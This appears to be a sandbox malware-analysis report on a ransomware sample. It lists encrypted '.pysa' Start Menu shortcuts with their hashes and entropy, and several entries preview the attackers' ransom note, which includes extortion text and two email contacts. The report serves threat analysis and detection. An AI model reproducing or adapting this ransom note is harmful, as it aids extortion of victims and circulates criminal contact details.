                  MD5:BCB7CC5020200BD8ACE57545331A7867
                  SHA1:C0B2C040F964F77EB5D98FD11E698B54A4BEFCB8
                  SHA-256:FBF5AA7F69A76C8F617379C3BE8CB304DABDE1D2E64F6578DD780E4A34604508
                  SHA-512:BCD593A598711904449508CF5E921FDB8C9D1288E16C35E0E68B14DB60527A112D7EE509872A2570F2203678B9805991332B9A7FA213B05F0D62EF7C08266AB3
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):6.782965311863101
                  Encrypted:false
                  SSDEEP:96:FEKRce0DWFvfE2kjcmK7MNSTtH+qx07fEsqjk5a8AZJfRxlf:uUcFLjcEMeqx6EVgw8iJ5xt
                  MD5:739872A3A9D32BF52F9E128EB3A8C4C6
                  SHA1:832961DEDE912D961350A15D20AAFC12A87E0768
                  SHA-256:EB5063DCDDFD6A8C6976686FF8BE116AFE4B06F46CAE972000D3838F1FD01D9F
                  SHA-512:72568332F9BF8C3A315A71991863BFC167CE4D9C52D8B12B3A9E4E8E449099BBD3B79E549BDFD077D69D6B3163DD8E7AE901BDA58DE30C447103D2E38350A729
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\dfrgui.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.077774685836253
                  Encrypted:false
                  SSDEEP:48:8XRXOjIOcDRq9k3QT7SpSMx4rt6s8E7ltmjyGJUBydNPyyjpsdIvgiIK9LNS:8Xttf8kAT7SD4rnl4/JpdNaqp1vh9LNS
                  MD5:88C23200BB5A09904E753FA7C1F3DDE7
                  SHA1:B36349A66445219A99982A392E101365090856FC
                  SHA-256:EA4828A71563A53951887426B6F8B602EDAC892B67AFB6FD19B8BAD534339D50
                  SHA-512:D3B23F3CFEE5A6A9472EE76EB111E27B70D815E1079A0531DD0B4FFBCC4377DC25F8B013F38F15959AB8669F6CBAD7BBCF407F27E5298D039E9C360858873E5D
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\iSCSI Initiator.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.057789330222501
                  Encrypted:false
                  SSDEEP:48:iZHpmXZgrs8BIKaxSzaWb6wZGuXdOzagY19Ly1jtpJLe2t+LXaJioCaaC7jTbhg1:i2XZgrs8BRMPWHZLXEW9LydtpJDtqjoM
                  MD5:7D5D00E95685193519B0C0D68821F8FB
                  SHA1:69DAF048803BB9D841A989B59D2C8DA2E46F31FD
                  SHA-256:2C14CFA46F3A34528CF41C23B6C9118B923B72B8C4D44A5FFC73D7E7A5AD1310
                  SHA-512:A5BE02AC9B5F882C9869C4BAE25C1396211D61C038EC549AFF212BF3CC150892340F90F871ECA0291E85ECE0059BCDDFA7136820B04D41BAF3DEABB001D410D4
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\services.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.034066996888035
                  Encrypted:false
                  SSDEEP:48:+PlEfl5XUfgit4SgZ9wtwZqd9V3/DnhsAUUv2d7cggGd/j5pEjjD9daRWYML26Pq:3jXeHaSgZatEqB2A7ud7cggGZjsJwfMQ
                  MD5:F1938CDD6735BFFAFB43933C4E0B7CC3
                  SHA1:97EF7C77A05BF44BB82F416D7EF37A0AC79BDD05
                  SHA-256:77E15D4676A47CDC816659E90BEC1C24F62EAFA0E964050EE673A40C73E68358
                  SHA-512:EEC4E3CEB986E7CE700A15023BBAEC8337A031B015492EB21B12E72C57EC8A01CC9B077E8287D8E3D626A392B0E8CBE01BCE6C743D7C3A5A9DCAFA51D31CCDB9
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\AutoIt Help File.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.05972611295568
                  Encrypted:false
                  SSDEEP:48:4tpSxA9hIV0/z5wzxzAyh7D2bB1jrDStvcw0dZAVwjFXBjgNy42NT:4iSU2VQzBoB1jrmGdZ1pXBjgyf
                  MD5:1541A4D8FBB4B5CC60024237CACD62B9
                  SHA1:D8210AA8A48BE45E683AB62E3523DC7B0F4548E6
                  SHA-256:3A3DE445588A9475A59B5D060967B082510B131E384EEA51850A51510EB536B6
                  SHA-512:D33B3B6FEE3AE1C0826A948E1890D622A28EC12BD88FBCD058C38BC85A9E8C90DE578B569BC2A94D48696A3D2E9B6D7486E2A91C618BD1D976D9FA1C448E911C
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\AutoIt Window Info (x64).lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.040110220920717
                  Encrypted:false
                  SSDEEP:48:inR31MPPFpgCCtjsf/musDGexqvpPyumCcNTDlbJbOp442K5pskjxlTQkPg:inR31OPFnXfuXie8NyFHNTTOSgMk1RLY
                  MD5:0DABA175984D6638C0D289B95324C554
                  SHA1:0CE038B5CBE9594B984D5C21B1503C1DCBA7C9CB
                  SHA-256:5F448F5D88F80C124D861DEEFD4EA647821A0F60A4C7C85E76C3D2D59A43898F
                  SHA-512:5FEC56B872005FD4F58D2BC49738D183162B9DDD8FA5EAB47F6C53FFE2F2C78EC076FDA68A923C95830C401EF578CAE89D8BFB92FE0BCE8E7AC75144348CD999
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\AutoIt Window Info (x86).lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.053331475612381
                  Encrypted:false
                  SSDEEP:48:/IUQccDtaeW1uC6bgJzpB7UBU0JeayxDAmZk2jAo+KVnU3bkFc5DYCXzbIluY3:/WDQeWAC6bsrQBUged9AskcAo+KW3bkV
                  MD5:7EF6058A4B82993BFC9CD301D86858AA
                  SHA1:B6C4B51A19374DB072675C9430BF791B47EC4727
                  SHA-256:56C0D6EB1BB29C6CAF1B2A51A23F404F0E5775C7B4AC5B1941EABD3FDF438162
                  SHA-512:EEF29BE3E0012E006DBF09D4A1B20B2C4B12921DC081A79577F97423D1CC3EDCF7F86E4A3235FB97B6E46E9BD5149C73B0B73E82F8853028380AB04DD674905F
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Check For Updates.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.072461317195369
                  Encrypted:false
                  SSDEEP:48:z4lu3DHdkn1MaJTkH+miC6BCc4Auzg2har4kC3gj1SDeVpaHspeDef1c3dBZl:zCwHdknaiC6BC0uzhodnRpPaMpeDe4Zl
                  MD5:01F82AE4020D63C1C29BA053DD929EC2
                  SHA1:8648A278CC477DD6EEAE02EFED22B0BEDF7A25C3
                  SHA-256:07F08F148C087F966C865ACA31261AF7B4E7A0873D5A583C72C6B029E9C154B9
                  SHA-512:30829CE11FFCB498A71F232C37636B0BD9166B7D973E616143176D3BEB9E8B096843B97B30063A087166358A80929ED7EF803D5030AD713989AF836D5CBEC043
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Compile Script to .exe (x64).lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.063255328435594
                  Encrypted:false
                  SSDEEP:48:Nq20bqggNLoD5ltkBD2sJZConFTb0FUHX9IW/iSmytiRIyTHwTksgWW+2fnqI2:Nq2jho9ltkBSWZC4TGUHXNamaQrKfqI2
                  MD5:535EAA38915FF5453D1F05C5C81F0C81
                  SHA1:EC21A519E864931A6E6991683462985ACCC407A2
                  SHA-256:3AFA48D0769521DCC5FD6B8AA0F74BFF73BBAAA369739C779C466A38D43B5777
                  SHA-512:76D88355E137D881C6F92F6C07088587F08D6F5A89D8450AD33915C3BC52C38BEBF70273C36BD2E3A5C47261902356F9F8E72AD4967E6E809FF3D51069BBFED2
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Compile Script to .exe (x86).lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.05328114897745
                  Encrypted:false
                  SSDEEP:48:J3+3vs7DILiE+dezUpUa4htpoxXeKv6eo8MyUFznhyIv7+oAAZFcXlPp:83vsUuE+IUpUa2qFk5pFVuo+Pp
                  MD5:F320AB6154D8F48C5AD2E6DC56878F6C
                  SHA1:BFF53C8873C9A410EBB2E9E51DB1835FE84ED9FC
                  SHA-256:83E2855155E9BDDBCA512DB78704A02B545CDF885514DD8FBD03189E8B604013
                  SHA-512:B36A5A555F0B62239133DF41785E5AA726BD440997997ED4E597D9245E40DD425B03F036B014240D4D02FBD12D241BC490AC759A89ECF919278D8163901A27AE
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Examples.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.061065605399158
                  Encrypted:false
                  SSDEEP:48:q7Zu2TZCpkflSzg9As6CGrtUudZhQVmL4ZF7MFj5tftHlcxpfx0WoKxEx7J3:q7DsutSkD6CGriuHaVHZFYFftHYJRlxO
                  MD5:97F7D615C5BAFA2B84CC45778D6BAD88
                  SHA1:530C5BDD3A8E85DE5F178888E1AB986E50F50EC2
                  SHA-256:2F91AFDED0BFE851DB4F1ED6F94106A93AD7530045B7A1F443E370D90363B0FF
                  SHA-512:DEFBD4E28D4B98B60505967F9306857C64961443349C62767624C3E5FD3C7CFD543AAFECE91B0A347FD81183EBC044FA39BC9F38C8B893D2CF5188552674919D
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoIt v3 Website.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.054082498216279
                  Encrypted:false
                  SSDEEP:48:W1ilquIBH50zGAAERikeFk4dv99QHTERLtKcekyqlN3pZJ5ULeoVK9owB/LF/K9T:J5IBZ0aA5RibFTv9W8w0lZHJ5ULdVK92
                  MD5:EB5B46F6E6C51D7E4848D4F0304D9903
                  SHA1:A0D9D202A511D38E7E4175C7BB026938DF001EF7
                  SHA-256:FD536E5562F5C86A8290B1801480E3E966BED94C8CA2B8837D6B6E740F628A4E
                  SHA-512:FB615686920FB29BA87EC4AE23A824468BEC0D06C249CBD5812B6A41E0D8373C649723EBF70DF455460194C2F1540234402457A03190096D1058F34EB78F56DB
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX\AutoItX Help File.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.053155168343968
                  Encrypted:false
                  SSDEEP:48:pLf11pfHUfJKR2yYN/c85K3QZ1aYVbVcjyCRAuvZKBWH28elvhH+iXgbBcEsiKOI:5fRMsDm/coKAZ1acbVcjyC5vsSRel5HT
                  MD5:DBD8F4AD68295F90456DAD6B6EEDEB27
                  SHA1:F6CD00F2ED3BC13248457558284726141B115013
                  SHA-256:75304855469F8CDE7F0E69881A328BF038E501932C64E207DD7089FA6E6082FD
                  SHA-512:38847CBD9C04A2E0C9240141AD0B2007B932CCE439840FEF44E02C57C02BA31556FEFC06F33B52F1AD05D7C40423A867B220C95D6035A6770EAA3127F133ACCE
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5330
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmb/:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1b/
                  MD5:86829E285FFE753B46764498EB17BAD5
                  SHA1:5A2AD87C28C9DCE2BA754E741D4BE79762A8F3F5
                  SHA-256:97158737768A6DDD6F469376A7B1AD422F7E372942CB4870936C31125C3EFBF0
                  SHA-512:6B3E70D24EF4871B6C07439547D578AA5B6D964B8CEE1B41F9E1C5636EEEAE4993DABCCE617673C9BD7DD30EB50F6DABE39E19113797B6E7CC1EC4E7EE26FE5C
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX\VBScript Examples.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.052931979440348
                  Encrypted:false
                  SSDEEP:48:4dJ1v0Hx8T2Akjq9BRez+TCU13JWa0Sa4iv2TKgLcJ3YHqGYidLt9QEJiftA1bXw:4X1cHiTbZBksCsva4zTy3iLt9Qiifm1s
                  MD5:C1A006CEA9A00584C853841D3A624900
                  SHA1:24EA7E7F1C3B7AD295B629CAC1E57C8916C224C9
                  SHA-256:ADF257BDE097C42D7E52FD5E816F6F4C4CA197525CC6F95BD94B4903FAB4DCC1
                  SHA-512:0F11B47AD7357292217A83CF0EA7D830C2AD31C66D5D6360623C256AD5E3C5810603C7E49DACE18F4246D944918A558D3E7422795B5F05A3F09FAB36F80F1FDD
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\Browse Extras.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.031623879955938
                  Encrypted:false
                  SSDEEP:48:mrARG3ciUePR/8OPuov2QUQ0nI0UA6EtZ/6TwZAoZQaJM1KkM0BI4:mt3meZ/dPKJpnIHtYkInyy70BI4
                  MD5:0AA0F02D6C75D70649C0D109FF088C1F
                  SHA1:90621270ED9880766893B2C8D85D67BC5C146E1B
                  SHA-256:F9B2163316B221270A9912C4A3F4F57CA81ED70FCD69F8451E6A134001424520
                  SHA-512:60527EE142C374E955AF1701C0C7A8349301730742D6D41BAC506D0AC31AB2DC5FA82EBD0577F5756CB2CA5A91A9D818BA46BCC19D4A1D6CE4F52CC6EFB7895F
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5863
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbi:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bi
                  MD5:7D2D0230A6D2F068D349F2A3DC2154DA
                  SHA1:08754C94E77D1D995CE1416B1BBD01AA64A34651
                  SHA-256:F03E8315D380F0A2E34B2221D627CC7288406492494420A86CED75999338921A
                  SHA-512:D1B1123E7C6CB6C89C2B7411DE439FB03B13D341A7091BDF913CD08FB8BFDBFCEFE9A4AC7A345A3E558001F938B85861317194AF8358FB7D935F7EAB7F3C433E
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5863
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbi:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bi
                  MD5:7D2D0230A6D2F068D349F2A3DC2154DA
                  SHA1:08754C94E77D1D995CE1416B1BBD01AA64A34651
                  SHA-256:F03E8315D380F0A2E34B2221D627CC7288406492494420A86CED75999338921A
                  SHA-512:D1B1123E7C6CB6C89C2B7411DE439FB03B13D341A7091BDF913CD08FB8BFDBFCEFE9A4AC7A345A3E558001F938B85861317194AF8358FB7D935F7EAB7F3C433E
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Run Script (x64).lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.0471133740656855
                  Encrypted:false
                  SSDEEP:48:jTLt4f1/DQC8qZKL9IHv6uLj/vvTXzbxYb0wDL+iyL2frPhTliW6:jO1/MqZKL9Qd346GfrJTz6
                  MD5:F47A88ECD481C54263E0EC5913AE1BF4
                  SHA1:B795E6981B6A6DB3C62B21701107F890BA921D25
                  SHA-256:4984041E2A1D7B049820FDCA798E7A8F54272EF0A8081E37D1F93D1ACAD1300B
                  SHA-512:D1EA30C4325B3A4A2887BA277002D0BF1130EB0944C1E70FBC9DC48AADF2831BE98D8CBA31607698F60601DC2E6E0FFC742BBC4B28E2410372F9DCC017E53DDB
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Run Script (x86).lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.051480125225609
                  Encrypted:false
                  SSDEEP:48:oUrL4zkzxUmiS60m7YgyrbsE7tDLNLGKfw4TQal/06CPHPrEab:oELbu0Pm7Y/99LFwEhTLab
                  MD5:AD97BF02C55A6483B33E99E7B698B9FF
                  SHA1:5F4BD9B1A87FD91540886726470342B66E175AE1
                  SHA-256:6B27485E87611AF1C6DAC334A26964A9A25620523B5C375B0F3FB2B63F9D22E4
                  SHA-512:9B5087DD3F4F51D209BA7F9B9AB315254157DD9218D3BE14E101609170542B7C60E55750B8E3DC619CA866A5D9E0535C33B2BFC40F16DF40F80733B5C2C44481
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\SciTE Script Editor.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.061378014652832
                  Encrypted:false
                  SSDEEP:48:lVF2okUBpTf8H/VnTSiZcStKxL1tqzZqO2O/5kIwRUbWItpqQS8YekW:lV/R1f8NTSGcdL/qND2O/qIUIt/z
                  MD5:6F7A06AE2130F2CAF01D9ED37191973A
                  SHA1:CF5841B0F7804F3C2C21EB0BB4FAB56BDC26C6D6
                  SHA-256:562A54AE3696F1B2A325AD4A7C0732046631A15E33139BAEFE8C48022ABB323F
                  SHA-512:99F445200CDD0F7A58AC780B687D33B4288AC1752C31EB9817734EE8BC3D21A45E8F88EB9B907A146D9ED2423E7B42C4828F0C520B2607EF88F27159C96A91C6
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Excel 2016.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):6.77673582188244
                  Encrypted:false
                  SSDEEP:96:vHTnoxFsrGbMFW2rWdhe3rK+H9plOi9gNSb+6hw0KpMj1psonBik:vHjoUrnFWze3r19pkWYSb+6hHKo1Oond
                  MD5:AD5C1B3EDDD9222F7D66A16D4E636162
                  SHA1:9FBBFE8FDDE5B4DC470554582E87D9B1AADF95C9
                  SHA-256:91D312ADFE833F65BC58185A27B3AD5A729071D35CB817121999BE98A95C8904
                  SHA-512:9F8C1B71342D4DB0EC8D7C70DD0D3F7D28544AAC4E36CA3A827C1E4F4835F400A18A8A2BDD8C5D919537801D912AC0D1F90726476F952FA5D1D450F3A8A1251A
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):6.778028863234764
                  Encrypted:false
                  SSDEEP:96:zZ5b5pq9dhYOe78kuqXcXshXj4Nt3vuFdppKTS/c4XpO:7b5Idhy7JuvXshT432FbQTTeO
                  MD5:80E0F38A5F4DE7A7D508349308A17C8C
                  SHA1:9605102DD08F4800612E20AB880F1556418C683A
                  SHA-256:8473E17A528CCA2C739E601A7C20C67FA3F3370004AE37AF62DFB38CF25136E2
                  SHA-512:A03CE162FAF9B58773C67223059F9F768B8034CFEBDCFEFA8C1ABB5AE2BE5DA009EC2359C3C3BD66331B8030ACE528546904F8B15F77FA25F4561D4400000836
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java\About Java.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):6.7727988988783405
                  Encrypted:false
                  SSDEEP:96:3ugKkGMiZCuv+PfX64andk9EjitPzY+6DKtPkn0hHtk:nKUiZaP64sKEjidj6Dcti
                  MD5:DE13D6EE093A377A55DE7DF66A572FA1
                  SHA1:F0F116179972C1DD283821D54451AD0F25707FA4
                  SHA-256:FB4C2F7461BE3359DDE5F7963867218ACC27B8F789EBE284B13FF01CBC3DEFF5
                  SHA-512:EC25233CBAACC89491428A0FF0214185438768A510A5AE0DA09B1A9FD77072431602EFE225818F922C6D43FB77393A5AB06A6BB4FB84ED4DE082F3B89BEED57D
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java\Check For Updates.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):6.770737338824047
                  Encrypted:false
                  SSDEEP:96:RN9aEvpNwiihxcejVtAIA5RBQSVBhUFnisQNgpSU1AFrgJEw:X9aExNwFCejTRYBMQypSuApgJJ
                  MD5:085B6EDA9299FBBE69B020F06A449325
                  SHA1:063C674E0F7FF553B1D1F63B615BFC4B3F63C8B8
                  SHA-256:6FCB4B4B5878D036928BAC0F319FDC49925EA198CA90BD30B1BFBA995962C09A
                  SHA-512:E59734049F6082ADD11E6E023292231CA8DA31F0FB73D29D71C70398258E274F93422524B1886F098D40B084BAE306EAE693DA61D64C88A033BCD88ACF517C55
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java\Configure Java.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):6.760180905289734
                  Encrypted:false
                  SSDEEP:96:Uai7dsExCZNvpJ8dafQ1rLZVg80sSreozx:FvZNUd0Q5g8nozx
                  MD5:121B93E5E9408B9030727CEE8BB5B7F2
                  SHA1:4A9696D0D628BF3CD2281262410CED369A473B35
                  SHA-256:D83A1A160BF6ED005FDC7625D6D482CBFB8752EB947B39697CDF7E10015D9F45
                  SHA-512:BA868B081F2AA6DF2161D97D40A11F767BEB57B98DA03BBECB6B0CAAD679EEEA33228A17B4A06AC07C9081E56763BE6496D965D50D9E71B0FD0D6A8024E796F0
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5863
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbi:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bi
                  MD5:7D2D0230A6D2F068D349F2A3DC2154DA
                  SHA1:08754C94E77D1D995CE1416B1BBD01AA64A34651
                  SHA-256:F03E8315D380F0A2E34B2221D627CC7288406492494420A86CED75999338921A
                  SHA-512:D1B1123E7C6CB6C89C2B7411DE439FB03B13D341A7091BDF913CD08FB8BFDBFCEFE9A4AC7A345A3E558001F938B85861317194AF8358FB7D935F7EAB7F3C433E
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5863
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbi:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bi
                  MD5:7D2D0230A6D2F068D349F2A3DC2154DA
                  SHA1:08754C94E77D1D995CE1416B1BBD01AA64A34651
                  SHA-256:F03E8315D380F0A2E34B2221D627CC7288406492494420A86CED75999338921A
                  SHA-512:D1B1123E7C6CB6C89C2B7411DE439FB03B13D341A7091BDF913CD08FB8BFDBFCEFE9A4AC7A345A3E558001F938B85861317194AF8358FB7D935F7EAB7F3C433E
                  Malicious:false
